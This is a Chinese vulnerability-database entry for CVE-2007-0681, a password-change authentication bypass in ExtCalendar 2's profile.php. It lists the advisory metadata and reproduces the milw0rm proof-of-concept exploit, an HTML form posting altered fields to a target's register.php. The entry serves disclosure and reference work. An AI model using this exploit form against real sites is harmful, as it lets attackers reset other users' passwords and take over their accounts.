ExtCalendar'profile.php'密码问题漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112135 漏洞类型 加密问题
发布时间 2007-01-31 更新时间 2007-02-02
CVE编号 CVE-2007-0681 CNNVD-ID CNNVD-200702-037
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3239
https://www.securityfocus.com/bid/86645
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200702-037
|漏洞详情
ExtCalendar2版本及其早期版本的profile.php允许远程攻击者可以借助对register.php的修改过的值,不用提供原密码就可以更改任意用户的密码并可能执行其他未验证操作。
|漏洞EXP
<form name="userform" action="http://[target]/register.php" method="post">
		<input name="step" type="hidden" value="regform">


		<tr>
			<td class='tableh2' colspan='2'>Account Information</td>

		</tr>
		<tr>
			<td class='tableb' width='160'>Username</td>
			<td class='tableb'>
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Password</td>

			<td class='tableb'><input type='password' name='password' class='textinput' value="" size='25' maxlength="16">
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Confirm Password</td>
			<td class='tableb'><input type='password' name='password_confirm' class='textinput' value="" size='25' maxlength="16">
			</td>
		</tr>

		<tr>
			<td class='tableb' width='160'>E-mail Address</td>
			<td class='tableb'><input type='text' name='email' class='textinput' value="" size='25'>
			</td>
		</tr>
		<tr>
			<td class='tableh2' colspan='2'>Other Details</td>
		</tr>

		<tr>
			<td class='tableb' width='160'>First Name</td>
			<td class='tableb'><input type='text' name='firstname' class='textinput' value="" size='25'>
			</td>
		</tr>
		<tr>
			<td class='tableb' width='160'>Last Name</td>
			<td class='tableb'><input type='text' name='lastname' class='textinput' value="" size='25'>

			</td>
		<tr>
			<td class='tableb' width='160'>Home page</td>
			<td class='tableb'><input type='text' name='user_website' class='textinput' value="" size='25'>
			</td>
		<tr>
			<td class='tableb' width='160'>Location</td>
			<td class='tableb'><input type='text' name='user_location' class='textinput' value="" size='25'>

			</td>
		<tr>
			<td class='tableb' width='160'>Occupation</td>
			<td class='tableb'><input type='text' name='user_occupation' class='textinput' value="" size='25'>
			</td>
		</tr>

		<tr>

			<td class='tablec' colspan='2' align='center' valign='middle' height='40'>
				<input name='submit' type='submit' value="  Submit my registration  " class='button'>
			</td>
		</tr>
<!-- END submit_row -->
	</form>

# milw0rm.com [2007-01-31]
|受影响的产品
ExtCalendar ExtCalendar 2
|参考资料

来源:MILW0RM
名称:3239
链接:http://www.milw0rm.com/exploits/3239
来源:OSVDB
名称:38130
链接:http://osvdb.org/38130
来源:XF
名称:extcalendar-profile-security-bypass(32035)
链接:http://xforce.iss.net/xforce/xfdb/32035
来源:MILW0RM
名称:3239
链接:http://milw0rm.com/exploits/3239